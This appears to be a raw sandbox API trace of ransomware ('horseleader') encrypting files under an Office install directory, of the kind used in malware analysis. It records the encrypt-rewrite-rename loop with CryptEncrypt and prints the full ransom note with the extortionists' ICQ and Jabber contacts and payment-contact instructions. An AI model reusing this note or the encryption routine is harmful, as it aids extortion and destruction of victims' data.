hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.925] CloseHandle (hObject=0x1a4) returned 1 [0244.925] GetProcessHeap () returned 0x780000 [0244.925] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.926] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe.horseleader") returned 105 [0244.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\Office Setup Controller\\Setup.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe.horseleader")) returned 1 [0244.927] GetProcessHeap () returned 0x780000 [0244.927] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.927] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Visio.en-us", cAlternateFileName="VISIO~1.EN-")) returned 1 [0244.927] lstrcmpiW (lpString1="Visio.en-us", lpString2="Windows") returned -1 [0244.927] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us") returned 95 [0244.927] lstrcmpW (lpString1="Visio.en-us", lpString2=".") returned 1 [0244.927] lstrcmpW (lpString1="Visio.en-us", lpString2="..") returned 1 [0244.927] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.927] GetProcessHeap () returned 0x780000 [0244.927] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.927] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\*") returned 97 [0244.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.929] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.929] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\.") returned 97 [0244.930] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.930] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="..", cAlternateFileName="")) returned 1 [0244.930] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.930] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\..") returned 98 [0244.930] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.930] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0244.930] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43bdc500, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.930] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.930] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 105 [0244.930] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.930] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.930] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.930] lstrlenW (lpString=".testttjffg") returned 11 [0244.930] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.930] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.930] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 105 [0244.935] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.935] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=6241) returned 1 [0244.935] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x1861, lpOverlapped=0x0) returned 1 [0244.937] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe79f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.937] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x1861, lpOverlapped=0x0) returned 1 [0244.938] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.938] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.938] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.938] CloseHandle (hObject=0x15c) returned 1 [0244.938] GetProcessHeap () returned 0x780000 [0244.938] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.938] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.horseleader") returned 117 [0244.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.horseleader")) returned 1 [0244.939] GetProcessHeap () returned 0x780000 [0244.939] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.939] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4359ac00, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50b66320, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="VisioMUI.XML", cAlternateFileName="")) returned 1 [0244.940] lstrcmpiW (lpString1="VisioMUI.XML", lpString2="Windows") returned -1 [0244.940] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 108 [0244.940] StrStrIW (lpFirst="VisioMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.940] lstrcmpW (lpString1="VisioMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.940] lstrcmpW (lpString1="VisioMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.940] lstrlenW 
(lpString=".testttjffg") returned 11 [0244.940] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.940] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.940] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.942] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 108 [0244.942] StrStrW (lpFirst="VisioMUI.XML", lpSrch=".txt") returned 0x0 [0244.942] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=9503) returned 1 [0244.942] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x251f, lpOverlapped=0x0) returned 1 [0244.944] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffdae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.944] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x251f, lpOverlapped=0x0) returned 1 [0244.945] SetFilePointerEx 
(in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.945] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.945] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.945] CloseHandle (hObject=0x15c) returned 1 [0244.945] GetProcessHeap () returned 0x780000 [0244.945] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.945] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.horseleader") returned 120 [0244.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.horseleader")) returned 1 [0244.946] GetProcessHeap () returned 0x780000 [0244.946] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.946] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4359ac00, ftCreationTime.dwHighDateTime=0x1d305eb, 
ftLastAccessTime.dwLowDateTime=0x50b66320, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="VisioMUI.XML", cAlternateFileName="")) returned 0 [0244.946] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.946] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\#Decrypt#.txt") returned 109 [0244.947] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.950] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.950] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.951] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.951] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.951] CloseHandle (hObject=0x1a4) returned 1 [0244.951] 
GetProcessHeap () returned 0x780000 [0244.951] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.951] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="VISIOR", cAlternateFileName="")) returned 1 [0244.951] lstrcmpiW (lpString1="VISIOR", lpString2="Windows") returned -1 [0244.952] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR") returned 90 [0244.952] lstrcmpW (lpString1="VISIOR", lpString2=".") returned 1 [0244.952] lstrcmpW (lpString1="VISIOR", lpString2="..") returned 1 [0244.952] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.952] GetProcessHeap () returned 0x780000 [0244.952] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.952] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\*") returned 92 [0244.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, 
ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.952] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.953] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\.") returned 92 [0244.953] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.953] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="..", cAlternateFileName="")) returned 1 [0244.953] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.953] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\..") returned 93 [0244.953] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.953] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a6d3200, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0xb541d799, 
dwReserved1=0xec7654e2, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.953] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.953] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 100 [0244.953] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.953] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.953] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.953] lstrlenW (lpString=".testttjffg") returned 11 [0244.954] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.954] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.954] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 100 [0244.955] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.955] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=20577) returned 1 [0244.955] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, 
